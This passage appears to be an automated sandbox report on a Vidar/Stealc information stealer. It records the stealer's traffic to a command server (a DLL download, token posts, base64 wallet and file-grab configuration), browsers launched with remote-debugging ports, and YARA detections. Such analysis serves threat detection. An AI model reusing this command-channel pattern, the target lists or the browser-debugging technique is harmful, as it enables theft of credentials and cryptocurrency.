User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:56 UTC | 633 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 12127067
Cache-Control: public, max-age=17280000
Content-Type: application/x-chrome-extension
Date: Thu, 21 Nov 2024 14:48:56 GMT
Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
Server: ECAcc (nyd/D11E)
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.3
X-Cache: HIT
X-CCC: US
X-CID: 11
X-Powered-By: ASP.NET
X-Powered-By: ARR/3.0
X-Powered-By: ASP.NET
Content-Length: 11185
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 49834 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:57 UTC | 234 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:57 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:57 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Thursday, 21-Nov-2024 14:48:57 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                                                                                                                                                                  Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                                                                                                                                                                  Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 49837 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:49:03 UTC | 319 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 1081
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:49:03 UTC | 1081 | OUT | Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------ECFHJKEBAAECBFHIECGICont
2024-11-21 14:49:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:49:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:49:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.8 | 49838 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:49:05 UTC | 318 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:49:05 UTC | 331 | OUT | Data Ascii: ------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------IECFBKFHCAEHJJKEGDGHCont
2024-11-21 14:49:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:49:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:49:05 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.8 | 49839 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:49:07 UTC | 318 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:49:07 UTC | 331 | OUT | Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------CAFHDBGHJKFIDHJJJEBKCont
2024-11-21 14:49:08 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:49:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:49:08 UTC | 1656 | IN | Data Ascii: 66cRG9jdW1ldHN8JURPQ1VNRU5UUyVcfCoudHh0fDUwfDJ8KndpbmRvd3MqfERlc2t0b3BBbGx8JURFU0tUT1AlXHwqLnR4dHw1MHwzfCp3aW5kb3dzKnxERVNLVE9Qd2FsbGV0fCVERVNLVE9QJVx8KndhbGxldCouKiwqc2VlZCouKiwqYnRjKi4qLCprZXkqLiosKjJmYSouKiwqY3J5cHRvKi4qLCpjb2luKi4qLCpwcml2YXRlKi4qLC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.8 | 49840 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:49:10 UTC | 318 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FCAKFCGCGIEGDGCAAKKJ
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 461
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-11-21 14:49:10 UTC | 461 | OUT | Data Ascii:
------FCAKFCGCGIEGDGCAAKKJ
Content-Disposition: form-data; name="token"

13feffb011a79c40536aa4a7f1267eff
------FCAKFCGCGIEGDGCAAKKJ
Content-Disposition: form-data; name="build_id"

635b5ceb8ed09951eb8d5e776815ad72
------FCAKFCGCGIEGDGCAAKKJ
Cont
2024-11-21 14:49:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:49:11 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:49:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                  Start time:09:47:06
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                                                                                  Imagebase:0xaa0000
                                                                                                                                                                                                                                                                                                                  File size:5'526'528 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:0DA768D82B6B4B1CE65F888D4191A228
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.1596858257.0000000011A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                                  Start time:09:47:25
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                                                                                  Imagebase:0xf70000
                                                                                                                                                                                                                                                                                                                  File size:231'736 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                                  Start time:09:48:12
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                                  Start time:09:48:15
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                                  Start time:09:48:27
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                  Start time:09:48:28
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                                                  Start time:09:48:28
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                                                  Start time:09:48:29
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                                                  Start time:09:48:34
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                                                  Start time:09:48:34
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • CreateWaitableTimerEx when creating timer failedTime.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallcrypto/elliptic: fai, xrefs: 00AD1880
                                                                                                                                                                                                                                                                                                                    • VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer, xrefs: 00AD1825
                                                                                                                                                                                                                                                                                                                    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00AD17F1
                                                                                                                                                                                                                                                                                                                    • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait reasonwinmm.dll not, xrefs: 00AD175B
                                                                                                                                                                                                                                                                                                                    • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definit, xrefs: 00AD18A7
                                                                                                                                                                                                                                                                                                                    • %, xrefs: 00AD18E4
                                                                                                                                                                                                                                                                                                                    • bad g0 stackbad recoveryblacksquare;caller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifycontent-typecontext.TODOcurlyeqprec;curlyeqsucc;decode arraydecode slicediamondsuit;dumping heapempty numberend tracegcentersyscalleqslantl, xrefs: 00AD17CA
                                                                                                                                                                                                                                                                                                                    • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definition of NAFx509: IP constraint contained inval, xrefs: 00AD184C
                                                                                                                                                                                                                                                                                                                    • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)v, xrefs: 00AD18DB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1624821709.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_S0FTWARE.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3857051934
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aae15fd4fcaf50e564627e1c1f6bdae650b110e6b2576a401f3adc162289a222
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 284166abace735753ca11251f72d31e2a5708207c13ca335893a4ca430ad5ad0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aae15fd4fcaf50e564627e1c1f6bdae650b110e6b2576a401f3adc162289a222
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE81C0B45097059FD300EF64C29575ABBE0BF88704F00892EF48A8B392E7B4D949DF62
                                                                                                                                                                                                                                                                                                                    Strings
